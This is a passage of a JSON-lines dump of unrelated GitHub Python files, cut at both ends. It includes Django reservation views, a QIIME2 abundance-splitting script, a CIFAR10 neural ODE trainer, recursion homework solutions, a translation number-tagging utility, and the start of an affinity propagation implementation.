AdminReservationViewSet(viewsets.ModelViewSet):\n queryset = Reservation.objects.all()\n serializer_class = ReservationSerializer\n http_method_names = [\n \"get\",\n \"post\",\n \"patch\",\n \"delete\",\n \"put\",\n \"head\",\n \"options\",\n \"trace\",\n ]\n permission_classes = [ReservationPermission]\n\n def get_queryset(self):\n if self.request.user.is_superuser:\n return Reservation.objects.all()\n return ReservationService.find_managed_reservations(self.request.user)\n\n def destroy(self, request, *args, **kwargs):\n ReservationService.delete(self.get_object().id)\n return Response(data=\"delete success\")\n\n def create(self, request, *args, **kwargs):\n author = Person.objects.get(user=request.user)\n reservation_status = ReservationStatus.objects.create(\n author=author, note=request.data[\"note\"] if \"note\" in request.data else \"Reservation\"\n )\n request.data[\"author\"] = author.id\n reservation_data = super().create(request, *args, **kwargs).data\n reservation_data[\"reservation_status\"] = [reservation_status.id]\n reservation = Reservation.objects.get(dt_created=reservation_data[\"dt_created\"])\n reservation.reservation_status.add(reservation_status)\n reservation.save()\n return Response(reservation_data)\n\n def update(self, request, *args, **kwargs):\n author = Person.objects.get(user=request.user)\n reservation_status = ReservationStatus.objects.create(\n author=author, note=request.data[\"note\"] if \"note\" in request.data else \"Reservation\"\n )\n request.data[\"author\"] = author.id\n reservation_data = super().update(request, *args, **kwargs).data\n reservation = self.get_object()\n reservation.reservation_status.add(reservation_status)\n reservation.save()\n\n reservation_data[\"reservation_status\"] = [status.id for status in reservation.reservation_status.all()]\n return Response(reservation_data)\n\n def partial_update(self, request, *args, **kwargs):\n if \"attendees\" not in request.data:\n return Response(data=\"Attendees to change not specified\", status=400)\n kwargs[\"partial\"] = True\n request._full_data = {\"attendees\": request.data[\"attendees\"]}\n return self.update(request, *args, **kwargs)\n\n def get_serializer_context(self):\n return {\"request\": self.request}\n\n\nclass AdminReservationTemplateView(ListView):\n @staticmethod\n @user_passes_test(\n lambda u: u.is_superuser\n or u.has_perm(\"reservations.is_room_manager\")\n or u.has_perm(\"reservations.is_group_manager\")\n )\n def reservation_get_view(request, reservation_id):\n reservation = ReservationService.find_by_id(reservation_id)\n template = loader.get_template(\"administrator/reservations/detail.html\")\n return HttpResponse(template.render({\"reservation\": reservation}, request))\n\n @staticmethod\n @user_passes_test(\n lambda u: u.is_superuser\n or u.has_perm(\"reservations.is_room_manager\")\n or u.has_perm(\"reservations.is_group_manager\")\n )\n def reservations_get_view(request):\n page = request.GET.get(\"page\", 1)\n\n if request.user.is_superuser:\n paginator = Paginator(ReservationService.find_all(), DEFAULT_PAGE_SIZE)\n else:\n paginator = Paginator(ReservationService.find_managed_reservations(request.user), DEFAULT_PAGE_SIZE)\n\n try:\n reservations = paginator.page(page)\n except PageNotAnInteger:\n reservations = paginator.page(1)\n except EmptyPage:\n reservations = paginator.page(paginator.num_pages)\n\n return render(request, \"administrator/reservations/list.html\", {\"reservations\": reservations})\n\n @staticmethod\n @user_passes_test(lambda u: u.is_superuser)\n def reservation_delete_view(request, reservation_id):\n template = loader.get_template(\"administrator/reservations/list.html\")\n if not ReservationService.delete(reservation_id):\n return HttpResponse(template.render({\"errors\": [\"Failed to delete reservation\"]}, request))\n return redirect(\"/administrator/reservations/\")\n\n @staticmethod\n @user_passes_test(\n lambda u: u.is_superuser\n or u.has_perm(\"reservations.is_room_manager\")\n or u.has_perm(\"reservations.is_group_manager\")\n )\n def reservation_create_view(request):\n form = AdminReservationForm(request, request.POST or None)\n template = loader.get_template(\"administrator/reservations/create.html\")\n\n if form.is_valid():\n if not ReservationService.save(form.cleaned_data, request.user):\n return HttpResponse(template.render({\"errors\": [\"Something went wrong\"], \"form\": form}, request))\n return redirect(\"/administrator/reservations/\")\n return HttpResponse(template.render({\"form\": form}, request))\n\n @staticmethod\n @user_passes_test(lambda u: u.is_superuser)\n def reservation_edit_view(request, reservation_id):\n instance = ReservationService.find_by_id(reservation_id)\n template = loader.get_template(\"administrator/reservations/update.html\")\n\n if instance is None:\n raise Http404(\"Reservation does not exist\")\n form = AdminReservationForm(request, request.POST or None, instance=instance)\n\n if form.is_valid():\n if not ReservationService.update(instance, form.cleaned_data, request.user):\n return HttpResponse(template.render({\"errors\": [\"Something went wrong\"], \"form\": form}, request))\n return redirect(\"/administrator/reservations/\")\n return HttpResponse(template.render({\"form\": form, \"reservation\": instance}, request))\n","repo_name":"tomas-dostal/fit-reservations","sub_path":"src/reservations/views/administrator/reservation.py","file_name":"reservation.py","file_ext":"py","file_size_in_byte":6610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34706287870","text":"__author__= 'Pedro J. Torres'\nimport argparse\nimport os\nimport pandas,numpy\n\n\"\"\"Script allows you to take in an output file from qiime2 barplots and split each sample into its own file with the raw counts in one row and the percent abundance in another.\"\"\"\n\n#-----------Command Line Arguments-----------------\nparser=argparse.ArgumentParser(description=\"This script uses numpy and pandas. Make sure both are installed. Script will make an individual file for each sample from a qiime2 barplot otput and give their raw counts and percent abudnances. - Pedro J. Torres\")\nparser.add_argument('-i','--input', help=' Input csv file you want to split',required=True)\nargs = parser.parse_args()\ncsvfile=str(args.input) \n\n#---------Rearrange Taxa category to make it easier to parse-----\nprint ('split script has started ...')\nfin=open(csvfile, 'rU')\nfout=open('temp1.csv','w+')\nheader=fin.readline()\nfout.write('Taxa'+','+header[48:]) # the file given to me had tab delimeted headers for the k,p,c,o,f,g,s so this can be changed to suit your needs. If any issues I can help\n\n#This will re organize the file to make it easier to transform our data sicne K,P,C,O ECT.. are tab delimeted\nfor line in fin:\n line= line.split(',')\n taxa=line[:6]\n taxa=(\";\".join(taxa))#taxa is now ';' seperated\n taxa=taxa.strip('\\n')\n taxabundance=line[6:]# this is all our taxa abundance\n taxabundance=(\",\".join(taxabundance))\n newline=taxa+'\\t'+taxabundance\n fout.write(newline)\nfout.close()\nfin.close()\n\n#------------Temp file will be transformed in pandas to split easier-----\ndf=pandas.read_csv('temp1.csv')\ndft=(df.set_index('Taxa').T)\ndft.to_csv('temp.csv')\nos.remove(\"temp1.csv\")# remove old temp file from before\n\n#-------------- Split columns into different Temp files based on sample ------\nfin2=open('temp.csv', 'rU')\nfout2=open('tmp2.csv', 'w+')\nheader=fin2.readline()\nheader= header.strip(',').replace('\\t','_').replace(\" \",\"_\")\nheads=\"SampleID\"+','+header\nheads=heads.split(',')\nheads= '\\t'.join(heads)\nfor line in fin2:\n linesplit= line.split(',')\n filename = linesplit[0]# nme of file\n fout2=open(filename+\".tmp.csv\",'w+')\n rowinfo =\"\\t\".join(linesplit)\n fout2.write(heads)\n fout2.write(rowinfo)\nfin2.close()\nfout2.close()\n\n#---------------- Make Final file with Taxa, raw counts, and percetn abundance\nos.remove('temp.csv')\nos.remove('tmp2.csv')\nF=[i for i in os.listdir('.') if i.split('.')[-2]=='tmp']\ncount=0\nfor f in F:\n count += 1\n try:\n colname=f.split('.')[0]\n newfile= f.split('.')[0]+'_percent.csv'\n df=pandas.read_table(f, sep='\\t')\n dft=(df.set_index('SampleID').T)\n dft = dft.sort_values(colname, ascending=False)\n dft['Percent']= (dft[colname]/dft[colname].sum())*100\n dft.to_csv(newfile)\n os.remove(f)\n except pandas.io.common.EmptyDataError:\n print (f, \" is empty\")\n\nprint ('Done :)')\nprint (\"There are \" + str(count)+ \" samples\")\n","repo_name":"pjtorres/16S_amplicon_preprocessing_code","sub_path":"percent_taxa_per_sample_split.py","file_name":"percent_taxa_per_sample_split.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"41115021729","text":"import cv2\ncap=cv2.VideoCapture(1)\nret=cap.set(3,5000)\nret=cap.set(4,5000)\nret=cap.set(15,-1)\n#cap.set(10,230)#亮度,最高250\n#cap.set(11,200)#对比度,最高250\n\n\nn=0\ntime=10\n\ndict={}\n\nwhile 1:\n #print (cap.get(3))\n #print (cap.get(4))\n #print (cap.get(14))\n #print (cap.get(15))\n _,frame=cap.read()\n #d=d+frame\n cv2.imshow('1',frame)\n #cv2.imshow('d',d)\n cv2.waitKey(1)\n dict[n]=frame\n \n f=0\n y=time\n if n>y:\n del dict[n-y-1]\n #print ('n is ',n)\n while y>=1:\n #print ('y is ',y)\n y=y-1\n f=cv2.add(f,dict[n-y])\n \n \n cv2.imshow('f',f)\n \n #e=dict[n]+dict[n-1]+dict[n-2]+dict[n-3]+dict[n-4]+dict[n-5]\n \n \n \n n=n+1\n \n","repo_name":"wjb711/Python_learn","sub_path":"微光夜视2.py","file_name":"微光夜视2.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"36391890218","text":"\"\"\"Command line interface to animate Hyades\n\nNote:\n Save feature requires ffmpeg installed.\n Oct 6, 2021 All three animations and the save feature work on the lab iMac\n quiet broke things somehow\n\n\"\"\"\nimport os\nimport argparse\nimport matplotlib.pyplot as plt\nfrom graphics.animated_eulerian import eulerian_animation\nfrom graphics.animated_histograms import histogram_animation\nfrom graphics.animated_lineout import lineout_animation\n\n\ndescription = '''A command line interface to make simple animations of Hyades runs.\n\nOptions to animate the Eulerian position of the run, distributions\nof a variable (with inset lineout), or the lineout of any variable\non its own.\n\nUsing --save requires ffmpeg. Currently, there is no alternative.\n\nExamples:\n If you already ran the simulation diamond_decay, the following\n line would animate the distribution of pressures in the sample\n $ python animate.py diamond_decay -l Pres\n \n The following line would make an Eulerian space animation, and\n color the animation using the Particle Velocity at each point.\n The extensions --save and --quiet are combined into -sq so the\n graphics would be saved and would not be displayed.\n $ python animate.py diamond_decay -e U -sq\n'''\nepilog = '''\n ___ _ _ \n | _ \\_ _| || |_ _ \n | _/ || | __ | || |\n |_| \\_, |_||_|\\_, |\n |__/ |__/ \n Developed by the Wicks Lab at JHU\n'''\n\nparser = argparse.ArgumentParser(prog='animate.py',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=description,\n epilog=epilog\n )\n\nparser.add_argument('filename', type=str,\n help='Name of the Hyades run to be plotted. Does not require file extension.')\nparser.add_argument('-e', '--eulerian',\n help='Animate the sample moving through Eulerian space. Colors the sample with a variable.')\nparser.add_argument('-g', '--histogram',\n help='Animate the distribution of a variable over time.')\nparser.add_argument('-l', '--lineout',\n help='Animate a lineout of a variable over time.')\nparser.add_argument('-c', '--coordinate', choices=('e', 'eulerian', 'l', 'lagrangian'),\n help='Coordinate system to use on the x-axis of XT Diagrams and Lineouts. (Default: Lagrangian)'\n '\\nOnly applies to --lineout.')\n\nparser.add_argument('-s', '--save', nargs='?', const=12,\n help='* Requires ffmpeg installed * '\n 'Saves all graphics at specified frames per second (default: 12 fps). '\n 'Saving long animations may take a couple minutes.')\nparser.add_argument('-q', '--quiet', action='store_true',\n help='Toggle to hide the graphics.'\n ' Recommend use with --save for saving files without viewing.')\n\nargs = parser.parse_args()\n# End parser\n\nabs_path = os.path.join('./data/', os.path.splitext(args.filename)[0])\nbase_save_filename = os.path.join('./data', os.path.splitext(args.filename)[0], os.path.splitext(args.filename)[0])\ncoordinate_system = args.coordinate or 'Lagrangian'\nif coordinate_system == 'e':\n coordinate_system = 'Eulerian'\nelif coordinate_system == 'l':\n coordinate_system = 'Lagrangian'\n\nif args.eulerian:\n animation = eulerian_animation(abs_path, args.eulerian)\n if args.save:\n save_filename = f'{base_save_filename} {args.eulerian} eulerian.mp4'\n print(f'Saving {save_filename}...')\n animation.save(save_filename, fps=args.save)\n print('Saved.')\n\nif args.histogram:\n animation = histogram_animation(abs_path, args.histogram)\n if args.save:\n save_filename = f'{base_save_filename} {args.histogram} histogram.mp4'\n print(f'Saving {save_filename}...')\n animation.save(save_filename, fps=args.save)\n print('Saved.')\n\nif args.lineout:\n animation = lineout_animation(abs_path, args.lineout, coordinate_system=coordinate_system)\n if args.save:\n save_filename = f'{base_save_filename} {args.lineout} lineout.mp4'\n print(f'Saving {save_filename}...')\n animation.save(save_filename, fps=args.save)\n print('Saved.')\n\nif not args.quiet:\n plt.show()\n\nif args.quiet and (not args.save):\n print('Selection did not display or save the graphics. See --help for more info.')\n\n# Below is the best line of Python I've ever written\nis_only_filename = not any([getattr(args, arg) for arg in vars(args) if not arg == 'filename'])\nif is_only_filename:\n print('Whoops! No graphics were specified.'\n 'Try adding one of the options to plot a figure. See --help for more info.')\n","repo_name":"WicksGroup/pyhy","sub_path":"animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":4890,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"36827422698","text":"\"\"\"\nTrain a Vanilia NODE on CIFAR10 dataset.\npython3 cifar10_vaniliaNODE.py --net_layer_num 16 --conv_channel_num 128 --h 0.1 --lr 1e-3 --weight_decay 1e-3 --max_epochs 3 --scheduler_milestones=[1, 2, 3] --scheduler_gamma=0.1\n\"\"\"\n\n\"\"\"\nthis script implements the CIFAR10 classification task using the NODE+Euler discretization method\nby using the following tricks, we can show that the contraction regularization improves the robustness to Guasssian noise\n- proper weight initializaton\n- smooth leaky relu with slop 0.1\n- porper optimization parameters\n\"\"\"\n\n\n\n\nfrom pl_bolts.transforms.dataset_normalizations import cifar10_normalization\nfrom pl_bolts.datamodules import CIFAR10DataModule\nimport torchvision\nfrom torch.optim.lr_scheduler import MultiStepLR\nimport argparse\nimport matplotlib.pyplot as plt\nfrom tomlkit import comment\nfrom pytorch_lightning import LightningModule\nfrom torchvision import datasets, transforms\nimport pytorch_lightning as pl\nfrom torchmetrics import Accuracy\nfrom torch.nn import functional as F\nimport torchvision.transforms as T\nimport torch\nfrom torch import nn\nfrom pytorch_lightning.loggers import TensorBoardLogger\nclass Net(nn.Module):\n def __init__(self, net_layer_num, conv_channel_num, h):\n super().__init__()\n self.net_layer_num = net_layer_num\n self.conv_channel_num = conv_channel_num\n\n # output of self.conv0 self.conv_channel_num*32*32\n self.conv0 = nn.Conv2d(3, self.conv_channel_num, 3, 1, 1)\n self.bn = nn.BatchNorm2d(self.conv_channel_num)\n self.dropout1 = nn.Dropout(0.1)\n self.dropout2 = nn.Dropout(0.2)\n self.conv = nn.ModuleList([nn.Conv2d(self.conv_channel_num,\n self.conv_channel_num, 3, 1, 1) for i in range(self.net_layer_num)]) # output of self.conv[i] is self.conv_channel_num*32*32\n\n self.fc1 = nn.Linear(self.conv_channel_num*32*32, 10)\n self.h = h\n\n def smooth_leaky_relu(self, x):\n alpha = 0.1\n return alpha*x+(1 - alpha) * torch.log(1+torch.exp(x))\n\n def forward(self, x):\n x = self.conv0(x)\n x = self.bn(x)\n x = self.dropout1(x)\n for i in range(self.net_layer_num):\n x = x+self.h*self.smooth_leaky_relu(self.conv[i](x))\n\n x = torch.flatten(x, 1)\n x = self.dropout2(x)\n logits = self.fc1(x)\n return logits\n\n\nclass CIFAR10Classifier(LightningModule):\n def __init__(self, net_layer_num, conv_channel_num, h, lr, weight_decay, scheduler_milestones, scheduler_gamma):\n super().__init__()\n self.net_layer_num = net_layer_num\n self.conv_channel_num = conv_channel_num\n self.h = h\n self.lr = lr\n self.weight_decay = weight_decay\n self.scheduler_milestones = scheduler_milestones\n self.scheduler_gamma = scheduler_gamma\n self.neural_net = Net(net_layer_num, conv_channel_num, h)\n self.acc = Accuracy()\n\n def forward(self, x):\n return self.neural_net(x)\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n logits = self.forward(x)\n train_loss = F.cross_entropy(logits, y.long())\n self.log(\"train_loss\", train_loss)\n self.log(\"optimizer_lr\", self.optimizer.param_groups[0][\"lr\"])\n return train_loss\n\n def test_step(self, batch, batch_idx):\n x, y = batch\n logits = self.forward(x)\n loss = F.cross_entropy(logits, y.long())\n self.acc(logits, y)\n self.log(\"test_acc\", self.acc)\n self.log(\"test_loss\", loss)\n self.log(\"hp_metric\", self.acc)\n\n def configure_optimizers(self):\n self.optimizer = torch.optim.SGD(\n self.neural_net.parameters(),\n lr=self.lr,\n momentum=0.9,\n weight_decay=self.weight_decay\n )\n self.scheduler = MultiStepLR(\n self.optimizer, milestones=self.scheduler_milestones, gamma=self.scheduler_gamma)\n return [self.optimizer], [self.scheduler]\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--net_layer_num', type=int, default=16)\n parser.add_argument('--conv_channel_num', type=int, default=128)\n parser.add_argument('--h', type=float, default=0.1)\n parser.add_argument('--max_epochs', type=int, default=100)\n parser.add_argument('--lr', type=float, default=5e-2)\n parser.add_argument('--weight_decay', type=float, default=1e-2)\n parser.add_argument('--scheduler_milestones',\n type=int, nargs='+', default=[50, 70, 80])\n parser.add_argument('--scheduler_gamma', type=float, default=0.1)\n args = parser.parse_args()\n\n # define NODE\n logger = TensorBoardLogger(\n \"tb_logs\", name=\"cifar10_vaniliaNODE\")\n logger.log_hyperparams({\"net_layer_num\": args.net_layer_num, \"conv_channel_num\": args.conv_channel_num,\n \"h\": args.h, \"max_epochs\": args.max_epochs, \"lr\": args.lr, \"weight_decay\": args.weight_decay, \"scheduler_milestones\": args.scheduler_milestones, \"scheduler_gamma\": args.scheduler_gamma})\n\n NODE = CIFAR10Classifier(net_layer_num=args.net_layer_num, conv_channel_num=args.conv_channel_num, h=args.h,\n lr=args.lr, weight_decay=args.weight_decay, scheduler_milestones=args.scheduler_milestones, scheduler_gamma=args.scheduler_gamma)\n logger.log_graph(NODE)\n\n trainer = pl.Trainer(gpus=[1, 2, 3], num_nodes=1,\n callbacks=[], max_epochs=args.max_epochs, logger=logger, gradient_clip_val=0.5)\n\n # generate data set\n # the transform follows the example here: https://pytorch-lightning.readthedocs.io/en/stable/notebooks/lightning_examples/cifar10-baseline.html\n train_transforms = torchvision.transforms.Compose(\n [\n torchvision.transforms.RandomCrop(32, padding=4),\n torchvision.transforms.RandomHorizontalFlip(),\n torchvision.transforms.ToTensor(),\n cifar10_normalization(),\n ]\n )\n train_dataloader = torch.utils.data.DataLoader(datasets.CIFAR10('data', train=True, download=True,\n transform=train_transforms), batch_size=128, shuffle=True)\n\n test_transforms = torchvision.transforms.Compose(\n [\n torchvision.transforms.ToTensor(),\n cifar10_normalization(),\n ]\n )\n\n test_dataloader = torch.utils.data.DataLoader(datasets.CIFAR10(\n 'data', train=False, transform=test_transforms), batch_size=128, shuffle=True)\n\n # train neural networks\n\n trainer.fit(NODE, train_dataloader)\n\n # test performance\n train_accuracy = trainer.test(NODE, train_dataloader)\n logger.log_metrics({\"train_accuracy\": train_accuracy[0][\"test_acc\"]})\n logger.log_metrics({\"train_loss\": train_accuracy[0][\"test_loss\"]})\n test_accuracy = trainer.test(NODE, test_dataloader)\n logger.log_metrics({\"test_accuracy\": test_accuracy[0][\"test_acc\"]})\n logger.log_metrics({\"test_loss\": test_accuracy[0][\"test_loss\"]})\n","repo_name":"lxutn/PDS2_hamiltonians","sub_path":"HDNN/cifar10_vaniliaNODE.py","file_name":"cifar10_vaniliaNODE.py","file_ext":"py","file_size_in_byte":7050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"17840254072","text":"HW_SOURCE_FILE = __file__\n\n\ndef num_eights(n):\n \"\"\"Returns the number of times 8 appears as a digit of n.\n\n >>> num_eights(3)\n 0\n >>> num_eights(8)\n 1\n >>> num_eights(88888888)\n 8\n >>> num_eights(2638)\n 1\n >>> num_eights(86380)\n 2\n >>> num_eights(12345)\n 0\n >>> num_eights(8782089)\n 3\n >>> from construct_check import check\n >>> # ban all assignment statements\n >>> check(HW_SOURCE_FILE, 'num_eights',\n ... ['Assign', 'AnnAssign', 'AugAssign', 'NamedExpr', 'For', 'While'])\n True\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n if n == 8:\n return 1\n elif n < 10:\n return 0\n else:\n return num_eights(n // 10)+num_eights(n % 10)\n\n\ndef pingpong(n):\n \"\"\"Return the nth element of the ping-pong sequence.\n\n >>> pingpong(8)\n 8\n >>> pingpong(10)\n 6\n >>> pingpong(15)\n 1\n >>> pingpong(21)\n -1\n >>> pingpong(22)\n -2\n >>> pingpong(30)\n -2\n >>> pingpong(68)\n 0\n >>> pingpong(69)\n -1\n >>> pingpong(80)\n 0\n >>> pingpong(81)\n 1\n >>> pingpong(82)\n 0\n >>> pingpong(100)\n -6\n >>> from construct_check import check\n >>> # ban assignment statements\n >>> check(HW_SOURCE_FILE, 'pingpong',\n ... ['Assign', 'AnnAssign', 'AugAssign', 'NamedExpr'])\n True\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n def direction(x):\n if x == 1:\n return 1\n elif num_eights(x) > 0 or x % 8 == 0:\n return -1*direction(x-1)\n else:\n return direction(x-1)\n if n == 1:\n return 1\n else:\n return pingpong(n-1)+direction(n-1)\n\n\ndef next_larger_coin(coin):\n \"\"\"Returns the next larger coin in order.\n >>> next_larger_coin(1)\n 5\n >>> next_larger_coin(5)\n 10\n >>> next_larger_coin(10)\n 25\n >>> next_larger_coin(2) # Other values return None\n \"\"\"\n if coin == 1:\n return 5\n elif coin == 5:\n return 10\n elif coin == 10:\n return 25\n\n\ndef next_smaller_coin(coin):\n \"\"\"Returns the next smaller coin in order.\n >>> next_smaller_coin(25)\n 10\n >>> next_smaller_coin(10)\n 5\n >>> next_smaller_coin(5)\n 1\n >>> next_smaller_coin(2) # Other values return None\n \"\"\"\n if coin == 25:\n return 10\n elif coin == 10:\n return 5\n elif coin == 5:\n return 1\n\n\ndef count_coins(change):\n \"\"\"Return the number of ways to make change using coins of value of 1, 5, 10, 25.\n >>> count_coins(15)\n 6\n >>> count_coins(10)\n 4\n >>> count_coins(20)\n 9\n >>> count_coins(100) # How many ways to make change for a dollar?\n 242\n >>> count_coins(200)\n 1463\n >>> from construct_check import check\n >>> # ban iteration\n >>> check(HW_SOURCE_FILE, 'count_coins', ['While', 'For'])\n True\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n def count_partitions(n, biggest_coin):\n if n == 0:\n return 1\n elif n < 0:\n return 0\n elif biggest_coin == None:\n return 0\n else:\n with_biggest = count_partitions(n-biggest_coin, biggest_coin)\n without_biggest = count_partitions(n, next_smaller_coin(biggest_coin))\n return with_biggest+without_biggest\n \n if change >= 25:\n biggest_coin = 25\n elif change >= 10:\n biggest_coin = 10\n elif change >= 5:\n biggest_coin = 5\n elif change >= 1:\n biggest_coin = 1\n else:\n biggest_coin = None\n return count_partitions(change-biggest_coin, biggest_coin)+count_partitions(change, next_smaller_coin(biggest_coin))","repo_name":"KeyboardxPang/cs61a","sub_path":"hw/hw03/hw03.py","file_name":"hw03.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30569363656","text":"import re\nimport utilities.misc as misc\nfrom config.regex_patterns import patterns, hindi_numbers\nfrom anuvaad_auditor.loghandler import log_info, log_exception\nfrom utilities import MODULE_CONTEXT\nimport numpy as np\n\n'''\nBelow funtions are meant to handle date, numbers and URls as part of pre and post translation processing\n'''\n\ndef tag_number_date_url(text):\n '''\n Tags numbers, dates and url in the input text and returns\n tagged text and the arrays of numbers,dates and urls\n '''\n try: \n if len(text) == 0:\n return \"\",\"\",\"\",\"\",\"\"\n \n resultant_str = list()\n count_date = 0\n date_original = list()\n count_url = 0\n url_dict = {}\n \n num_array,text,num_map = build_src_num_array(text)\n #log_info(\"number-tag mappings-{}\".format(num_map),MODULE_CONTEXT)\n for word in text.split():\n try:\n if misc.token_is_url(word) or misc.token_is_email(word):\n url_or_email = word\n word = 'UuRrLl'+str(count_url)\n url_dict[word] = url_or_email\n count_url +=1\n except Exception as e:\n log_exception(\"In handle_date_url:tag_num function:{}\".format(e),MODULE_CONTEXT,e)\n word = word\n \n resultant_str.append(word) \n s = [str(i) for i in resultant_str] \n res = str(\" \".join(s)) \n #log_info(\"tagged response:{} and date:{} and url:{}\".format(res,date_original,url_dict),MODULE_CONTEXT) \n\n return res,date_original,url_dict,num_array,num_map \n\n except Exception as e:\n log_exception(\"In handle_date_url:tag_num function parent except block:{}\".format(e),MODULE_CONTEXT,e)\n return text,[],[],(num_array or []),(num_map or [])\n\ndef replace_tags_with_original(text,date_original,url_dict,num_array,num_map):\n '''\n Replaces dates,urls and numbers in the text with the original values\n in place of the tags\n '''\n try: \n res = text\n \n if len(text) == 0:\n return \"\"\n\n for url_tag,url in url_dict.items():\n res = text.replace(url_tag,url)\n\n #log_info(\"response after url and date replacemnt:{}\".format(res),MODULE_CONTEXT) \n \n if len(num_map) == 0:\n ''' handling the case when model outputs a tag which is not in tagged_src(src is without any number'''\n for char in reversed(hindi_numbers): \n res = re.sub(r'NnUuMm'+char,\"\",res)\n num_map.reverse()\n for item in num_map:\n res = res.replace(item['tag'],str(item['no.']),1)\n \n res = remove_extra_tags(res) \n #log_info(\"response after tags replacement:{}\".format(res),MODULE_CONTEXT)\n return res \n except Exception as e:\n log_exception(\"Error in parent except block of replace_tags_with_original_1 function, returning tagged output:{}\".format(e),MODULE_CONTEXT,e)\n return res\n\ndef get_indices_of_num_with_zero_prefix(num_arr):\n ''' eg. '000','049' '''\n i = [i for i,j in enumerate(num_arr) if j.startswith(str(0))]\n return i\n\ndef update_num_arr(num_array,zero_prefix_num,i_zero,num_array_orignal):\n '''\n This is function is meant to handle zero prefix numbers like 09 or 000 which are converted to 9 or 0 during processing, We want them in original form i.e 09\n zero_prefix_num: this is the num that has to be transformed back with zero prefix(from 9 to 09, or, 0 to 000 originally)\n i_zero: indices of numbers with zero prefix in num_array_orignal\n ind: indices of zero prefix numbers in num_array descending\n\n Note: this function needs some fixing\n '''\n try:\n num_array_o = None\n num_array_o = num_array[:]\n \n ind = list()\n zero_prefix_num = np.unique(np.array(zero_prefix_num))\n for i in zero_prefix_num:\n for j,m in enumerate(num_array):\n if m == i:\n ind.append(j)\n for k,l in enumerate(ind):\n num_array[l] = num_array_orignal[i_zero[k]]\n return num_array\n except Exception as e:\n log_exception(\"Error in handle_date_url:update_num_arr,returning incoming num_array:{}\".format(e),MODULE_CONTEXT,e)\n return num_array_o\n \ndef build_src_num_array(i_text):\n num_map,num_dict = list(),{}\n count_number = 0\n all_patterns = patterns['p12']['regex']\n src_num_array = re.findall(all_patterns,i_text)\n int_num_array = list(map(lambda y:y.replace(',',''), src_num_array))\n int_num_array = list(map(int, int_num_array))\n num_dict = {k:v for (k,v) in zip(int_num_array,src_num_array)}\n int_num_array.sort(reverse=True)\n for k,v in enumerate(int_num_array):\n i_text = i_text.replace(num_dict[v],'NnUuMm'+str(hindi_numbers[count_number]),1)\n num_map.append({\"no.\":num_dict[v],\"tag\":'NnUuMm'+str(hindi_numbers[count_number])})\n count_number +=1\n if count_number >30:\n log_info(\"count exceeding 30,triggering break\",MODULE_CONTEXT)\n count_number = 30\n break\n\n return int_num_array,i_text,num_map\n \ndef remove_extra_tags(text):\n '''\n This funtion is meant for removing extra num,date and url tags from the output \n '''\n if len(re.findall(r'NnUuMm.', text)) > 0:\n ''' \n if model outputs extra tag than the number of count in num_map or \n some unreplaced tags, removing them from final output\n '''\n for char in reversed(hindi_numbers): \n text = re.sub(r'NnUuMm'+char,\"\",text) \n \n if len(re.findall(r'DdAaTtEe.', text)) > 0:\n ''' \n If any' unreplaced Date tag is still left, removing it in final output'\n Assuming in input there wont be more than 9 date patterns\n '''\n text = re.sub(r'DdAaTtEe.',\"\",text) \n \n if len(re.findall(r'UuRrLl.', text)) > 0:\n ''' \n If any' unreplaced url tag is still left, removing it in final output'\n Assuming in input there wont be more than 9 url patterns\n '''\n text = re.sub(r'UuRrLl.',\"\",text) \n \n return text ","repo_name":"Abhilash-tarento/anuvaad","sub_path":"anuvaad-nmt-inference/src/utilities/tagger_util.py","file_name":"tagger_util.py","file_ext":"py","file_size_in_byte":5690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"13258301655","text":"from itertools import cycle\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom time import time\nfrom typing import Any, Tuple\nfrom stqdm import stqdm\nimport streamlit as st\n\n\ndef compute_responsibility(\n S: np.ndarray, R: np.ndarray, A: np.ndarray, damping_factor: float = 0.5\n) -> np.ndarray:\n \"\"\"\n S: n by n matrix of similarities\n R: n by n matrix of current responsibilities\n A: n by n matrix of current availabilities\n damping_factor: Damping factor used to calculate new responsibilities. Acts as weight\n for the weighted sum of the old and new responsibilities.\n Returns matrix containing the new responsibilities.\n \"\"\"\n n = S.shape[0]\n\n AS = S + A\n rows = np.arange(n)\n np.fill_diagonal(AS, -np.inf)\n\n idx_max = np.argmax(AS, axis=1)\n first_max = AS[rows, idx_max]\n\n AS[rows, idx_max] = -np.inf\n second_max = AS[rows, np.argmax(AS, axis=1)]\n\n max_matrix = np.zeros_like(R) + first_max[:, None]\n max_matrix[rows, idx_max] = second_max\n\n new_R = R * damping_factor + (1 - damping_factor) * (S - max_matrix)\n return new_R\n\n\ndef compute_availability(\n R: np.ndarray, A: np.ndarray, damping_factor: float = 0.5\n) -> np.ndarray:\n \"\"\"\n R: n by n matrix of current responsibilities\n A: n by n matrix of current availabilities\n damping_factor: Damping factor used to calculate new availabilities. Acts as weight\n for the weighted sum of the old and new availabilities.\n Returns matrix containing the new availabilities.\n \"\"\"\n n = R.shape[0]\n k_idx = np.arange(n)\n a = np.array(R)\n a[a < 0] = 0\n np.fill_diagonal(a, 0)\n a = a.sum(axis=0)\n a = a + R[k_idx, k_idx]\n\n a = np.ones(A.shape) * a\n\n a -= np.clip(R, 0, np.inf)\n a[a > 0] = 0\n\n a_ = np.array(R)\n np.fill_diagonal(a_, 0)\n\n a_[a_ < 0] = 0\n\n a[k_idx, k_idx] = a_.sum(axis=0)\n\n new_A = A * damping_factor + (1 - damping_factor) * 